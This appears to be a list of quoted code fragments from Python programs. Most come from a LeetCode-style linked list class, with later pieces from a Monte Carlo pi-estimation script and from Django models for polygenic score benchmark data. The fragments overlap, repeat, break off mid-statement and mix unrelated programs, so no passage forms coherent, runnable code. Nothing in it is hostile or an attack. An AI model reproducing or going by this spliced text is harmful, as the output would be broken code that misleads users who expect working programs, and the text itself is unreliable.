:type val: int :rtype: void \"\"\" node", "self.size += 1 def addAtTail(self, val): \"\"\" Append a node of value val", "node self.size += 1 return else: curr = curr.next def deleteAtIndex(self, index): \"\"\"", "linked list. :type val: int :rtype: void \"\"\" node = Node(val) if self.head:", "None self.size -= 1 elif self.size > 1: counter = 0 prev =", "else: prev = next next = next.next counter += 1 # Your MyLinkedList", "the node will be appended to the end of linked list. If index", "None next = self.head while next: if counter == index: prev.next = next.next", "to the length of linked list, the node will be appended to the", "if the index is valid. :type index: int :rtype: void \"\"\" curr =", "length, the node will not be inserted. :type index: int :type val: int", "node in the linked list, if the index is valid. :type index: int", "self.size += 1 def addAtIndex(self, index, val): \"\"\" Add a node of value", "deleteAtIndex(self, index): \"\"\" Delete the index-th node in the linked list, if the", "0 prev = None next = self.head while next: if counter == index:", "val to the last element of the linked list. :type val: int :rtype:", "self.size == 0 or index == 0: self.addAtHead(val) else: node = Node(val) counter", "the new node will be the first node of the linked list. :type", "list, if the index is valid. :type index: int :rtype: void \"\"\" curr", "if index < 0 or index >= self.size: return -1 counter = 0", "+= 1 return else: curr = curr.next def deleteAtIndex(self, index): \"\"\" Delete the", "= curr.next def addAtHead(self, val): \"\"\" Add a node of value val before", "node will not be inserted. :type index: int :type val: int :rtype: void", "the linked list. 
:type val: int :rtype: void \"\"\" node = Node(val) if", "self.head: self.head = node else: curr = self.head while curr.next: curr = curr.next", "== index: prev.next = next.next self.size -= 1 return else: prev = next", "MyLinkedList() # param_1 = obj.get(index) # obj.addAtHead(val) # obj.addAtTail(val) # obj.addAtIndex(index,val) # obj.deleteAtIndex(index)", "node in the linked list. If index equals to the length of linked", "prev = None next = self.head while next: if counter == index: prev.next", "= Node(val) if self.head: node.next = self.head self.head = node else: self.head =", "in the linked list. If the index is invalid, return -1. :type index:", "val): \"\"\" Append a node of value val to the last element of", "addAtTail(self, val): \"\"\" Append a node of value val to the last element", "of linked list. If index is greater than the length, the node will", "self.size > 1: counter = 0 prev = None next = self.head while", "here. \"\"\" self.head = None self.size = 0 def get(self, index): \"\"\" Get", "# obj = MyLinkedList() # param_1 = obj.get(index) # obj.addAtHead(val) # obj.addAtTail(val) #", "else: node = Node(val) counter = 0 curr = self.head while curr: if", "1 return else: prev = next next = next.next counter += 1 #", ":type index: int :type val: int :rtype: void \"\"\" if self.size == 0", "index == 0 and self.size == 1 and self.head: self.head = None self.size", "to the end of linked list. If index is greater than the length,", "your data structure here. \"\"\" self.head = None self.size = 0 def get(self,", "Node(val) if self.head: node.next = self.head self.head = node else: self.head = node", "self.size -= 1 return else: prev = next next = next.next counter +=", "of value val before the index-th node in the linked list. 
If index", "while curr.next: curr = curr.next curr.next = node self.size += 1 def addAtIndex(self,", "__init__(self, value, nextNode=None): self.val = value self.next = nextNode class MyLinkedList(object): def __init__(self):", "self.head = node else: self.head = node self.size += 1 def addAtTail(self, val):", "self.head while curr.next: curr = curr.next curr.next = node self.size += 1 def", ":type val: int :rtype: void \"\"\" node = Node(val) if self.head: node.next =", ":rtype: void \"\"\" node = Node(val) if not self.head: self.head = node else:", "curr = self.head while curr: if counter == index: return curr.val counter +=", "= Node(val) counter = 0 curr = self.head while curr: if counter ==", "curr.next = node self.size += 1 def addAtIndex(self, index, val): \"\"\" Add a", "return -1. :type index: int :rtype: int \"\"\" if index < 0 or", "list. If index equals to the length of linked list, the node will", "else: curr = self.head while curr.next: curr = curr.next curr.next = node self.size", "node of value val to the last element of the linked list. :type", "will be appended to the end of linked list. If index is greater", "will be the first node of the linked list. :type val: int :rtype:", "\"\"\" Delete the index-th node in the linked list, if the index is", "index-th node in the linked list. If index equals to the length of", "self.head while curr: if counter == index-1: node.next = curr.next curr.next = node", "void \"\"\" node = Node(val) if self.head: node.next = self.head self.head = node", "index is greater than the length, the node will not be inserted. 
:type", "val): \"\"\" Add a node of value val before the index-th node in", "def get(self, index): \"\"\" Get the value of the index-th node in the", "= 0 prev = None next = self.head while next: if counter ==", "int :type val: int :rtype: void \"\"\" if self.size == 0 or index", "the insertion, the new node will be the first node of the linked", "self.head if index == 0 and self.size == 1 and self.head: self.head =", ":type val: int :rtype: void \"\"\" node = Node(val) if not self.head: self.head", "insertion, the new node will be the first node of the linked list.", "int :rtype: void \"\"\" if self.size == 0 or index == 0: self.addAtHead(val)", "before the first element of the linked list. After the insertion, the new", "return curr.val counter += 1 curr = curr.next def addAtHead(self, val): \"\"\" Add", "curr = curr.next def deleteAtIndex(self, index): \"\"\" Delete the index-th node in the", "index == 0: self.addAtHead(val) else: node = Node(val) counter = 0 curr =", "node else: self.head = node self.size += 1 def addAtTail(self, val): \"\"\" Append", "the index is invalid, return -1. :type index: int :rtype: int \"\"\" if", "value val before the index-th node in the linked list. If index equals", "index is invalid, return -1. :type index: int :rtype: int \"\"\" if index", "before the index-th node in the linked list. If index equals to the", "self.head: self.head = None self.size -= 1 elif self.size > 1: counter =", "= node else: self.head = node self.size += 1 def addAtTail(self, val): \"\"\"", "None self.size = 0 def get(self, index): \"\"\" Get the value of the", "0 and self.size == 1 and self.head: self.head = None self.size -= 1", "node else: curr = self.head while curr.next: curr = curr.next curr.next = node", "val before the index-th node in the linked list. If index equals to", "be instantiated and called as such: # obj = MyLinkedList() # param_1 =", "\"\"\" Get the value of the index-th node in the linked list. 
If", ":rtype: int \"\"\" if index < 0 or index >= self.size: return -1", "= self.head if index == 0 and self.size == 1 and self.head: self.head", "value val before the first element of the linked list. After the insertion,", "or index == 0: self.addAtHead(val) else: node = Node(val) counter = 0 curr", "= self.head while curr.next: curr = curr.next curr.next = node self.size += 1", "Add a node of value val before the first element of the linked", "else: self.head = node self.size += 1 def addAtTail(self, val): \"\"\" Append a", "= next next = next.next counter += 1 # Your MyLinkedList object will", "MyLinkedList(object): def __init__(self): \"\"\" Initialize your data structure here. \"\"\" self.head = None", "the index-th node in the linked list. If the index is invalid, return", "Node(object): def __init__(self, value, nextNode=None): self.val = value self.next = nextNode class MyLinkedList(object):", "of the index-th node in the linked list. If the index is invalid,", "curr.val counter += 1 curr = curr.next def addAtHead(self, val): \"\"\" Add a", "first element of the linked list. After the insertion, the new node will", "= None self.size = 0 def get(self, index): \"\"\" Get the value of", "in the linked list. If index equals to the length of linked list,", "linked list. After the insertion, the new node will be the first node", "if counter == index: prev.next = next.next self.size -= 1 return else: prev", "index): \"\"\" Delete the index-th node in the linked list, if the index", "+= 1 # Your MyLinkedList object will be instantiated and called as such:", "linked list. If the index is invalid, return -1. :type index: int :rtype:", "the length of linked list, the node will be appended to the end", "If the index is invalid, return -1. :type index: int :rtype: int \"\"\"", "curr.next def deleteAtIndex(self, index): \"\"\" Delete the index-th node in the linked list,", "to the last element of the linked list. 
:type val: int :rtype: void", "def __init__(self, value, nextNode=None): self.val = value self.next = nextNode class MyLinkedList(object): def", "1 def addAtTail(self, val): \"\"\" Append a node of value val to the", "and called as such: # obj = MyLinkedList() # param_1 = obj.get(index) #", "self.next = nextNode class MyLinkedList(object): def __init__(self): \"\"\" Initialize your data structure here.", "object will be instantiated and called as such: # obj = MyLinkedList() #", "= self.head while next: if counter == index: prev.next = next.next self.size -=", "if not self.head: self.head = node else: curr = self.head while curr.next: curr", "list. :type val: int :rtype: void \"\"\" node = Node(val) if self.head: node.next", "0 or index >= self.size: return -1 counter = 0 curr = self.head", "curr.next = node self.size += 1 return else: curr = curr.next def deleteAtIndex(self,", "node will be appended to the end of linked list. If index is", "= 0 curr = self.head while curr: if counter == index-1: node.next =", "# Your MyLinkedList object will be instantiated and called as such: # obj", "def deleteAtIndex(self, index): \"\"\" Delete the index-th node in the linked list, if", "1 elif self.size > 1: counter = 0 prev = None next =", "the linked list, if the index is valid. :type index: int :rtype: void", "counter += 1 # Your MyLinkedList object will be instantiated and called as", "After the insertion, the new node will be the first node of the", "list. :type val: int :rtype: void \"\"\" node = Node(val) if not self.head:", "== 0 or index == 0: self.addAtHead(val) else: node = Node(val) counter =", "new node will be the first node of the linked list. :type val:", "the index is valid. :type index: int :rtype: void \"\"\" curr = self.head", "Delete the index-th node in the linked list, if the index is valid.", ":type index: int :rtype: int \"\"\" if index < 0 or index >=", "list. 
After the insertion, the new node will be the first node of", "\"\"\" if self.size == 0 or index == 0: self.addAtHead(val) else: node =", "or index >= self.size: return -1 counter = 0 curr = self.head while", "node of value val before the first element of the linked list. After", "-1. :type index: int :rtype: int \"\"\" if index < 0 or index", "== index-1: node.next = curr.next curr.next = node self.size += 1 return else:", "= curr.next curr.next = node self.size += 1 return else: curr = curr.next", "-1 counter = 0 curr = self.head while curr: if counter == index:", "index): \"\"\" Get the value of the index-th node in the linked list.", "curr: if counter == index: return curr.val counter += 1 curr = curr.next", "= next.next counter += 1 # Your MyLinkedList object will be instantiated and", "self.head = node self.size += 1 def addAtTail(self, val): \"\"\" Append a node", "curr = self.head while curr.next: curr = curr.next curr.next = node self.size +=", "the linked list. If index equals to the length of linked list, the", "a node of value val to the last element of the linked list.", "index >= self.size: return -1 counter = 0 curr = self.head while curr:", "get(self, index): \"\"\" Get the value of the index-th node in the linked", "the linked list. If the index is invalid, return -1. :type index: int", "element of the linked list. After the insertion, the new node will be", "> 1: counter = 0 prev = None next = self.head while next:", "be inserted. 
:type index: int :type val: int :rtype: void \"\"\" if self.size", "Add a node of value val before the index-th node in the linked", "self.size += 1 return else: curr = curr.next def deleteAtIndex(self, index): \"\"\" Delete", "node self.size += 1 def addAtTail(self, val): \"\"\" Append a node of value", "void \"\"\" curr = self.head if index == 0 and self.size == 1", "= curr.next def deleteAtIndex(self, index): \"\"\" Delete the index-th node in the linked", "Your MyLinkedList object will be instantiated and called as such: # obj =", "index is valid. :type index: int :rtype: void \"\"\" curr = self.head if", "not self.head: self.head = node else: curr = self.head while curr.next: curr =", "while curr: if counter == index: return curr.val counter += 1 curr =", "1 return else: curr = curr.next def deleteAtIndex(self, index): \"\"\" Delete the index-th", "node = Node(val) if self.head: node.next = self.head self.head = node else: self.head", "void \"\"\" node = Node(val) if not self.head: self.head = node else: curr", "index: int :rtype: int \"\"\" if index < 0 or index >= self.size:", "be the first node of the linked list. :type val: int :rtype: void", "== 1 and self.head: self.head = None self.size -= 1 elif self.size >", "Initialize your data structure here. \"\"\" self.head = None self.size = 0 def", "counter += 1 curr = curr.next def addAtHead(self, val): \"\"\" Add a node", "0: self.addAtHead(val) else: node = Node(val) counter = 0 curr = self.head while", "of value val before the first element of the linked list. After the", "self.head while curr: if counter == index: return curr.val counter += 1 curr", "list, the node will be appended to the end of linked list. If", "is invalid, return -1. 
:type index: int :rtype: int \"\"\" if index <", "Append a node of value val to the last element of the linked", "curr.next curr.next = node self.size += 1 def addAtIndex(self, index, val): \"\"\" Add", "if counter == index-1: node.next = curr.next curr.next = node self.size += 1", "first node of the linked list. :type val: int :rtype: void \"\"\" node", "1: counter = 0 prev = None next = self.head while next: if", "= node self.size += 1 def addAtIndex(self, index, val): \"\"\" Add a node", "1 curr = curr.next def addAtHead(self, val): \"\"\" Add a node of value", "node = Node(val) if not self.head: self.head = node else: curr = self.head", "next.next counter += 1 # Your MyLinkedList object will be instantiated and called", "self.addAtHead(val) else: node = Node(val) counter = 0 curr = self.head while curr:", "node self.size += 1 def addAtIndex(self, index, val): \"\"\" Add a node of", "= curr.next curr.next = node self.size += 1 def addAtIndex(self, index, val): \"\"\"", "next: if counter == index: prev.next = next.next self.size -= 1 return else:", "curr = self.head if index == 0 and self.size == 1 and self.head:", "self.head while next: if counter == index: prev.next = next.next self.size -= 1", "return -1 counter = 0 curr = self.head while curr: if counter ==", "prev.next = next.next self.size -= 1 return else: prev = next next =", "= next.next self.size -= 1 return else: prev = next next = next.next", "next.next self.size -= 1 return else: prev = next next = next.next counter", "class MyLinkedList(object): def __init__(self): \"\"\" Initialize your data structure here. \"\"\" self.head =", "data structure here. 
\"\"\" self.head = None self.size = 0 def get(self, index):", "counter == index: return curr.val counter += 1 curr = curr.next def addAtHead(self,", "index equals to the length of linked list, the node will be appended", "= node self.size += 1 return else: curr = curr.next def deleteAtIndex(self, index):", "index, val): \"\"\" Add a node of value val before the index-th node", "structure here. \"\"\" self.head = None self.size = 0 def get(self, index): \"\"\"", "invalid, return -1. :type index: int :rtype: int \"\"\" if index < 0", "linked list. :type val: int :rtype: void \"\"\" node = Node(val) if not", "a node of value val before the index-th node in the linked list.", "index: return curr.val counter += 1 curr = curr.next def addAtHead(self, val): \"\"\"", ":rtype: void \"\"\" if self.size == 0 or index == 0: self.addAtHead(val) else:", "value of the index-th node in the linked list. If the index is", "__init__(self): \"\"\" Initialize your data structure here. \"\"\" self.head = None self.size =", "+= 1 curr = curr.next def addAtHead(self, val): \"\"\" Add a node of", "Get the value of the index-th node in the linked list. If the", "index-th node in the linked list. If the index is invalid, return -1.", "node.next = self.head self.head = node else: self.head = node self.size += 1", "\"\"\" node = Node(val) if self.head: node.next = self.head self.head = node else:", "the value of the index-th node in the linked list. If the index", "-= 1 return else: prev = next next = next.next counter += 1", "end of linked list. If index is greater than the length, the node", "self.head self.head = node else: self.head = node self.size += 1 def addAtTail(self,", "return else: prev = next next = next.next counter += 1 # Your", "the index-th node in the linked list, if the index is valid. :type" ]
[ "\"LMDG\": { \"title\": \"LMD-G\", \"color\": \"tab:red\", }, \"ROCKE3D\": { \"title\": \"ROCKE-3D\", \"color\": \"tab:green\",", "\"color\": \"tab:red\", }, \"ROCKE3D\": { \"title\": \"ROCKE-3D\", \"color\": \"tab:green\", }, \"UM\": { \"title\":", "}, \"LMDG\": { \"title\": \"LMD-G\", \"color\": \"tab:red\", }, \"ROCKE3D\": { \"title\": \"ROCKE-3D\", \"color\":", "-*- coding: utf-8 -*- \"\"\"Definitions and objects commonly used between scripts.\"\"\" MODELS =", "\"tab:blue\", }, \"LMDG\": { \"title\": \"LMD-G\", \"color\": \"tab:red\", }, \"ROCKE3D\": { \"title\": \"ROCKE-3D\",", "\"title\": \"ROCKE-3D\", \"color\": \"tab:green\", }, \"UM\": { \"title\": \"UM\", \"color\": \"tab:orange\", }, }", "utf-8 -*- \"\"\"Definitions and objects commonly used between scripts.\"\"\" MODELS = { \"ExoCAM\":", "<reponame>projectcuisines/gcm_ana<filename>commons.py<gh_stars>1-10 # -*- coding: utf-8 -*- \"\"\"Definitions and objects commonly used between scripts.\"\"\"", "\"\"\"Definitions and objects commonly used between scripts.\"\"\" MODELS = { \"ExoCAM\": { \"title\":", "commonly used between scripts.\"\"\" MODELS = { \"ExoCAM\": { \"title\": \"ExoCAM\", \"color\": \"tab:blue\",", "scripts.\"\"\" MODELS = { \"ExoCAM\": { \"title\": \"ExoCAM\", \"color\": \"tab:blue\", }, \"LMDG\": {", "# -*- coding: utf-8 -*- \"\"\"Definitions and objects commonly used between scripts.\"\"\" MODELS", "objects commonly used between scripts.\"\"\" MODELS = { \"ExoCAM\": { \"title\": \"ExoCAM\", \"color\":", "MODELS = { \"ExoCAM\": { \"title\": \"ExoCAM\", \"color\": \"tab:blue\", }, \"LMDG\": { \"title\":", "{ \"title\": \"LMD-G\", \"color\": \"tab:red\", }, \"ROCKE3D\": { \"title\": \"ROCKE-3D\", \"color\": \"tab:green\", },", "-*- \"\"\"Definitions and objects commonly used between scripts.\"\"\" MODELS = { \"ExoCAM\": {", "\"ExoCAM\", \"color\": \"tab:blue\", }, \"LMDG\": { \"title\": \"LMD-G\", \"color\": \"tab:red\", }, \"ROCKE3D\": {", "coding: utf-8 -*- \"\"\"Definitions and objects 
commonly used between scripts.\"\"\" MODELS = {", "and objects commonly used between scripts.\"\"\" MODELS = { \"ExoCAM\": { \"title\": \"ExoCAM\",", "\"ExoCAM\": { \"title\": \"ExoCAM\", \"color\": \"tab:blue\", }, \"LMDG\": { \"title\": \"LMD-G\", \"color\": \"tab:red\",", "\"LMD-G\", \"color\": \"tab:red\", }, \"ROCKE3D\": { \"title\": \"ROCKE-3D\", \"color\": \"tab:green\", }, \"UM\": {", "\"color\": \"tab:blue\", }, \"LMDG\": { \"title\": \"LMD-G\", \"color\": \"tab:red\", }, \"ROCKE3D\": { \"title\":", "\"ROCKE3D\": { \"title\": \"ROCKE-3D\", \"color\": \"tab:green\", }, \"UM\": { \"title\": \"UM\", \"color\": \"tab:orange\",", "\"tab:red\", }, \"ROCKE3D\": { \"title\": \"ROCKE-3D\", \"color\": \"tab:green\", }, \"UM\": { \"title\": \"UM\",", "\"title\": \"LMD-G\", \"color\": \"tab:red\", }, \"ROCKE3D\": { \"title\": \"ROCKE-3D\", \"color\": \"tab:green\", }, \"UM\":", "= { \"ExoCAM\": { \"title\": \"ExoCAM\", \"color\": \"tab:blue\", }, \"LMDG\": { \"title\": \"LMD-G\",", "between scripts.\"\"\" MODELS = { \"ExoCAM\": { \"title\": \"ExoCAM\", \"color\": \"tab:blue\", }, \"LMDG\":", "{ \"ExoCAM\": { \"title\": \"ExoCAM\", \"color\": \"tab:blue\", }, \"LMDG\": { \"title\": \"LMD-G\", \"color\":", "\"title\": \"ExoCAM\", \"color\": \"tab:blue\", }, \"LMDG\": { \"title\": \"LMD-G\", \"color\": \"tab:red\", }, \"ROCKE3D\":", "used between scripts.\"\"\" MODELS = { \"ExoCAM\": { \"title\": \"ExoCAM\", \"color\": \"tab:blue\", },", "{ \"title\": \"ExoCAM\", \"color\": \"tab:blue\", }, \"LMDG\": { \"title\": \"LMD-G\", \"color\": \"tab:red\", },", "}, \"ROCKE3D\": { \"title\": \"ROCKE-3D\", \"color\": \"tab:green\", }, \"UM\": { \"title\": \"UM\", \"color\":", "{ \"title\": \"ROCKE-3D\", \"color\": \"tab:green\", }, \"UM\": { \"title\": \"UM\", \"color\": \"tab:orange\", }," ]
[ "[], [] for _ in range(trials + 1): x, y = random(), random()", "+ \" trials processing time: \" + str(time.process_time() - start)) return 4 *", "time import logging import matplotlib.pyplot as plt logger = logging.getLogger() logging.basicConfig(level=logging.INFO) def estimate_pi(trials):", "/ trials def generate_sample(trials): in_x, in_y, out_x, out_y = [], [], [], []", "\" + str(time.process_time() - start)) return 4 * count / trials def generate_sample(trials):", "= random(), random() if x * x + y * y <= 1:", "0 for _ in range(trials + 1): x, y = random(), random() if", "import random import time import logging import matplotlib.pyplot as plt logger = logging.getLogger()", "x * x + y * y <= 1: count += 1 logger.info(\"estimate", "time.process_time() count = 0 for _ in range(trials + 1): x, y =", "count = 0 for _ in range(trials + 1): x, y = random(),", "x * x + y * y <= 1: in_x.append(x), in_y.append(y) else: out_x.append(x),", "out_y def draw_estimation(trials): in_x, in_y, out_x, out_y = generate_sample(trials) plt.plot(in_x, in_y, 'x', color='r')", "def draw_estimation(trials): in_x, in_y, out_x, out_y = generate_sample(trials) plt.plot(in_x, in_y, 'x', color='r') plt.plot(out_x,", "str(time.process_time() - start)) return 4 * count / trials def generate_sample(trials): in_x, in_y,", "* x + y * y <= 1: in_x.append(x), in_y.append(y) else: out_x.append(x), out_y.append(y)", "def generate_sample(trials): in_x, in_y, out_x, out_y = [], [], [], [] for _", "out_x, out_y = generate_sample(trials) plt.plot(in_x, in_y, 'x', color='r') plt.plot(out_x, out_y, 'o', color='b') plt.show()", "4 * count / trials def generate_sample(trials): in_x, in_y, out_x, out_y = [],", "<gh_stars>0 from random import random import time import logging import matplotlib.pyplot as plt", "+ y * y <= 1: in_x.append(x), in_y.append(y) else: out_x.append(x), out_y.append(y) return in_x,", "out_x, out_y def draw_estimation(trials): in_x, in_y, out_x, out_y = generate_sample(trials) 
plt.plot(in_x, in_y, 'x',", "y = random(), random() if x * x + y * y <=", "= time.process_time() count = 0 for _ in range(trials + 1): x, y", "logging.getLogger() logging.basicConfig(level=logging.INFO) def estimate_pi(trials): start = time.process_time() count = 0 for _ in", "x, y = random(), random() if x * x + y * y", "generate_sample(trials): in_x, in_y, out_x, out_y = [], [], [], [] for _ in", "if x * x + y * y <= 1: in_x.append(x), in_y.append(y) else:", "* y <= 1: in_x.append(x), in_y.append(y) else: out_x.append(x), out_y.append(y) return in_x, in_y, out_x,", "import logging import matplotlib.pyplot as plt logger = logging.getLogger() logging.basicConfig(level=logging.INFO) def estimate_pi(trials): start", "if x * x + y * y <= 1: count += 1", "pi with \" + str(trials) + \" trials processing time: \" + str(time.process_time()", "out_y = generate_sample(trials) plt.plot(in_x, in_y, 'x', color='r') plt.plot(out_x, out_y, 'o', color='b') plt.show() def", "+ y * y <= 1: count += 1 logger.info(\"estimate pi with \"", "random(), random() if x * x + y * y <= 1: in_x.append(x),", "y * y <= 1: in_x.append(x), in_y.append(y) else: out_x.append(x), out_y.append(y) return in_x, in_y,", "plt logger = logging.getLogger() logging.basicConfig(level=logging.INFO) def estimate_pi(trials): start = time.process_time() count = 0", "logging import matplotlib.pyplot as plt logger = logging.getLogger() logging.basicConfig(level=logging.INFO) def estimate_pi(trials): start =", "* y <= 1: count += 1 logger.info(\"estimate pi with \" + str(trials)", "random() if x * x + y * y <= 1: in_x.append(x), in_y.append(y)", "y * y <= 1: count += 1 logger.info(\"estimate pi with \" +", "logging.basicConfig(level=logging.INFO) def estimate_pi(trials): start = time.process_time() count = 0 for _ in range(trials", "_ in range(trials + 1): x, y = random(), random() if x *", "plt.plot(in_x, in_y, 'x', color='r') plt.plot(out_x, out_y, 'o', color='b') plt.show() def main(): 
print(estimate_pi(10000000)) draw_estimation(10000)", "out_x, out_y = [], [], [], [] for _ in range(trials + 1):", "in_y, out_x, out_y = [], [], [], [] for _ in range(trials +", "+= 1 logger.info(\"estimate pi with \" + str(trials) + \" trials processing time:", "out_y.append(y) return in_x, in_y, out_x, out_y def draw_estimation(trials): in_x, in_y, out_x, out_y =", "processing time: \" + str(time.process_time() - start)) return 4 * count / trials", "\" + str(trials) + \" trials processing time: \" + str(time.process_time() - start))", "= logging.getLogger() logging.basicConfig(level=logging.INFO) def estimate_pi(trials): start = time.process_time() count = 0 for _", "in_x.append(x), in_y.append(y) else: out_x.append(x), out_y.append(y) return in_x, in_y, out_x, out_y def draw_estimation(trials): in_x,", "generate_sample(trials) plt.plot(in_x, in_y, 'x', color='r') plt.plot(out_x, out_y, 'o', color='b') plt.show() def main(): print(estimate_pi(10000000))", "+ str(trials) + \" trials processing time: \" + str(time.process_time() - start)) return", "color='r') plt.plot(out_x, out_y, 'o', color='b') plt.show() def main(): print(estimate_pi(10000000)) draw_estimation(10000) if __name__ ==", "y <= 1: count += 1 logger.info(\"estimate pi with \" + str(trials) +", "x + y * y <= 1: count += 1 logger.info(\"estimate pi with", "in_y.append(y) else: out_x.append(x), out_y.append(y) return in_x, in_y, out_x, out_y def draw_estimation(trials): in_x, in_y,", "1): x, y = random(), random() if x * x + y *", "start = time.process_time() count = 0 for _ in range(trials + 1): x,", "out_y, 'o', color='b') plt.show() def main(): print(estimate_pi(10000000)) draw_estimation(10000) if __name__ == '__main__': main()", "+ str(time.process_time() - start)) return 4 * count / trials def generate_sample(trials): in_x,", "= generate_sample(trials) plt.plot(in_x, in_y, 'x', color='r') plt.plot(out_x, out_y, 'o', color='b') plt.show() def main():", "matplotlib.pyplot as plt logger = 
logging.getLogger() logging.basicConfig(level=logging.INFO) def estimate_pi(trials): start = time.process_time() count", "import matplotlib.pyplot as plt logger = logging.getLogger() logging.basicConfig(level=logging.INFO) def estimate_pi(trials): start = time.process_time()", "<= 1: in_x.append(x), in_y.append(y) else: out_x.append(x), out_y.append(y) return in_x, in_y, out_x, out_y def", "plt.plot(out_x, out_y, 'o', color='b') plt.show() def main(): print(estimate_pi(10000000)) draw_estimation(10000) if __name__ == '__main__':", "str(trials) + \" trials processing time: \" + str(time.process_time() - start)) return 4", "trials def generate_sample(trials): in_x, in_y, out_x, out_y = [], [], [], [] for", "in_x, in_y, out_x, out_y = [], [], [], [] for _ in range(trials", "logger = logging.getLogger() logging.basicConfig(level=logging.INFO) def estimate_pi(trials): start = time.process_time() count = 0 for", "random() if x * x + y * y <= 1: count +=", "random(), random() if x * x + y * y <= 1: count", "out_x.append(x), out_y.append(y) return in_x, in_y, out_x, out_y def draw_estimation(trials): in_x, in_y, out_x, out_y", "= [], [], [], [] for _ in range(trials + 1): x, y", "as plt logger = logging.getLogger() logging.basicConfig(level=logging.INFO) def estimate_pi(trials): start = time.process_time() count =", "\" trials processing time: \" + str(time.process_time() - start)) return 4 * count", "return 4 * count / trials def generate_sample(trials): in_x, in_y, out_x, out_y =", "out_y = [], [], [], [] for _ in range(trials + 1): x,", "time: \" + str(time.process_time() - start)) return 4 * count / trials def", "in range(trials + 1): x, y = random(), random() if x * x", "logger.info(\"estimate pi with \" + str(trials) + \" trials processing time: \" +", "random import random import time import logging import matplotlib.pyplot as plt logger =", "in_x, in_y, out_x, out_y = generate_sample(trials) plt.plot(in_x, in_y, 'x', color='r') plt.plot(out_x, out_y, 'o',", "[], 
[], [] for _ in range(trials + 1): x, y = random(),", "range(trials + 1): x, y = random(), random() if x * x +", "[] for _ in range(trials + 1): x, y = random(), random() if", "start)) return 4 * count / trials def generate_sample(trials): in_x, in_y, out_x, out_y", "for _ in range(trials + 1): x, y = random(), random() if x", "in_y, out_x, out_y def draw_estimation(trials): in_x, in_y, out_x, out_y = generate_sample(trials) plt.plot(in_x, in_y,", "<= 1: count += 1 logger.info(\"estimate pi with \" + str(trials) + \"", "with \" + str(trials) + \" trials processing time: \" + str(time.process_time() -", "from random import random import time import logging import matplotlib.pyplot as plt logger", "trials processing time: \" + str(time.process_time() - start)) return 4 * count /", "in_x, in_y, out_x, out_y def draw_estimation(trials): in_x, in_y, out_x, out_y = generate_sample(trials) plt.plot(in_x,", "'x', color='r') plt.plot(out_x, out_y, 'o', color='b') plt.show() def main(): print(estimate_pi(10000000)) draw_estimation(10000) if __name__", "= 0 for _ in range(trials + 1): x, y = random(), random()", "y <= 1: in_x.append(x), in_y.append(y) else: out_x.append(x), out_y.append(y) return in_x, in_y, out_x, out_y", "in_y, out_x, out_y = generate_sample(trials) plt.plot(in_x, in_y, 'x', color='r') plt.plot(out_x, out_y, 'o', color='b')", "in_y, 'x', color='r') plt.plot(out_x, out_y, 'o', color='b') plt.show() def main(): print(estimate_pi(10000000)) draw_estimation(10000) if", "count / trials def generate_sample(trials): in_x, in_y, out_x, out_y = [], [], [],", "* count / trials def generate_sample(trials): in_x, in_y, out_x, out_y = [], [],", "1: in_x.append(x), in_y.append(y) else: out_x.append(x), out_y.append(y) return in_x, in_y, out_x, out_y def draw_estimation(trials):", "random import time import logging import matplotlib.pyplot as plt logger = logging.getLogger() logging.basicConfig(level=logging.INFO)", "[], [], [], [] for _ in range(trials + 1): x, y =", 
"else: out_x.append(x), out_y.append(y) return in_x, in_y, out_x, out_y def draw_estimation(trials): in_x, in_y, out_x,", "x + y * y <= 1: in_x.append(x), in_y.append(y) else: out_x.append(x), out_y.append(y) return", "draw_estimation(trials): in_x, in_y, out_x, out_y = generate_sample(trials) plt.plot(in_x, in_y, 'x', color='r') plt.plot(out_x, out_y,", "def estimate_pi(trials): start = time.process_time() count = 0 for _ in range(trials +", "* x + y * y <= 1: count += 1 logger.info(\"estimate pi", "- start)) return 4 * count / trials def generate_sample(trials): in_x, in_y, out_x,", "1: count += 1 logger.info(\"estimate pi with \" + str(trials) + \" trials", "estimate_pi(trials): start = time.process_time() count = 0 for _ in range(trials + 1):", "+ 1): x, y = random(), random() if x * x + y", "1 logger.info(\"estimate pi with \" + str(trials) + \" trials processing time: \"", "import time import logging import matplotlib.pyplot as plt logger = logging.getLogger() logging.basicConfig(level=logging.INFO) def", "count += 1 logger.info(\"estimate pi with \" + str(trials) + \" trials processing", "return in_x, in_y, out_x, out_y def draw_estimation(trials): in_x, in_y, out_x, out_y = generate_sample(trials)" ]
[ "[] phenotype_structured = self.phenotype_structured.all() for phenotype in self.phenotype_structured.all(): data.append('<b>'+phenotype.id+'</b>: '+phenotype.label) return data def", ") name = models.CharField(verbose_name='Performance Metric Name', max_length=100, null=False) # ex: \"Odds Ratio\" name_short", "models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_sample') #cohorts_additional = models.TextField('Additional Sample/Cohort Information', null=True) def __str__(self): return", "EFO to a single score)\"\"\" id = models.CharField('Ontology Trait ID', max_length=30, primary_key=True) label", "metric_type): l.append((m.name_tuple(), m.display_value())) if len(l) != 0: return l return None class BM_Metric(models.Model):", "0: return l return None class BM_Metric(models.Model): \"\"\"Class to hold metric type, name,", "default='years') # e.g. [years, months, days] range = DecimalRangeField(verbose_name='Range (values)', null=True) range_type =", "samples\"\"\" # Links to related objects score_id = models.CharField('Polygenic Score (PGS) ID', max_length=30,", "+= ' {}'.format(self.unit) if len(e) > 0: l.append(e) # Variability v = None", "self.score_id, self.cohort.name_short) class Meta: get_latest_by = 'num' @property def effect_sizes_list(self): return self.get_metric_data('Effect Size')", "if not hasattr(self, 'bm_data'): self.get_bm_data() return len(self.bm_data['cohorts']) #cohorts = set() #for bm_performance in", "'Female') ] sample_sex = models.CharField(max_length=6, choices=SAMPLE_SEX_CHOICES, default='Both', verbose_name='Sample Sex' ) sample_age = models.OneToOneField(BM_Demographic,", "e += ' {}'.format(str(self.range)) e += ' {}'.format(self.unit) if len(e) > 0: l.append(e)", "International Classification of Diseases used in PGS \"\"\" id = models.CharField('Code ID', max_length=30,", "Name', max_length=100, null=False) # ex: \"Odds Ratio\" name_short = models.CharField(verbose_name='Performance 
